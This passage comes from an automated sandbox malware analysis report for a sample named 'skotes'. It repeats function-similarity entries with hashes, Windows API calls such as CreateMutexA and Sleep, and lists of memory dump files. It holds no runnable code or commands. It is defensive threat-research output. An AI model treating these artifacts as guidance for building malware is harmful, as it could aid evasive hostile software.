                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: 96672674645eb1a5fc4d12c39322113ca8b46250d78c980912b4b2ac8ab951d5
                                                                                                                                                                • Instruction ID: f6a9c28df2912c304fcc5803d44c427b6cad5c747d50fc2fb48a7e821925266b
                                                                                                                                                                • Opcode Fuzzy Hash: 96672674645eb1a5fc4d12c39322113ca8b46250d78c980912b4b2ac8ab951d5
                                                                                                                                                                • Instruction Fuzzy Hash: 9F312C316041049BFB08EF78DCC9BADB7E2EBC5314F2442AAE0559B2E5DB759980C712
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B8A685
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: 5673086aa81dc561f7d0477f560307a24140d6ba0420c3da6c2e9a6d7c6da6c4
                                                                                                                                                                • Instruction ID: a83a2df3a80b2b74899b48fd81bf08af04355f7233376b2a024fb646909e697b
                                                                                                                                                                • Opcode Fuzzy Hash: 5673086aa81dc561f7d0477f560307a24140d6ba0420c3da6c2e9a6d7c6da6c4
                                                                                                                                                                • Instruction Fuzzy Hash: 463139316042449BFB08EF78DCC9B6DBBF2DBC5314F2482AAE0159B2E5DB759980C752
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B8A7BA
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: 0c50f4cc05d06aca8d0a72e8c3f21aab5724c6ec02bc71b9dbd7d205ff309e24
                                                                                                                                                                • Instruction ID: c59ccd99a8ab218ff3b4d45cee485439a5144670a9e10331ca6c0e3e2c2ab2a9
                                                                                                                                                                • Opcode Fuzzy Hash: 0c50f4cc05d06aca8d0a72e8c3f21aab5724c6ec02bc71b9dbd7d205ff309e24
                                                                                                                                                                • Instruction Fuzzy Hash: DF315931A042049BFB08EF7CDDC9B6DB7E2DBC5310F2482AAE014972E5DB359981C722
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 1dfda4d4c3a5f5da896d3768f9dab71661c12e2f0cbd79be8d71d66718e3b642
                                                                                                                                                                • Instruction ID: 201256070536ab4f532945bfb4d46aab6b85ea1083c0dd48e877250df1438a65
                                                                                                                                                                • Opcode Fuzzy Hash: 1dfda4d4c3a5f5da896d3768f9dab71661c12e2f0cbd79be8d71d66718e3b642
                                                                                                                                                                • Instruction Fuzzy Hash: DE21D6329041086BEB217B68DC42FFF37A9EF41378F100291F9242B1C1DBF49E0196A1
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 639f00fd868da0c0017e9c96820f2720d75dd54d1dd9afd50fbc2461efe7e778
                                                                                                                                                                • Instruction ID: 59609e57055123a0bd7708367171e1849cc9785d4b4b9f4849742b9fd6bde6e0
                                                                                                                                                                • Opcode Fuzzy Hash: 639f00fd868da0c0017e9c96820f2720d75dd54d1dd9afd50fbc2461efe7e778
                                                                                                                                                                • Instruction Fuzzy Hash: 45E0CD2169D340A9F6147F6868D9F3D63D5C7D5B04F211575E705CB0E0CE646540C623
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
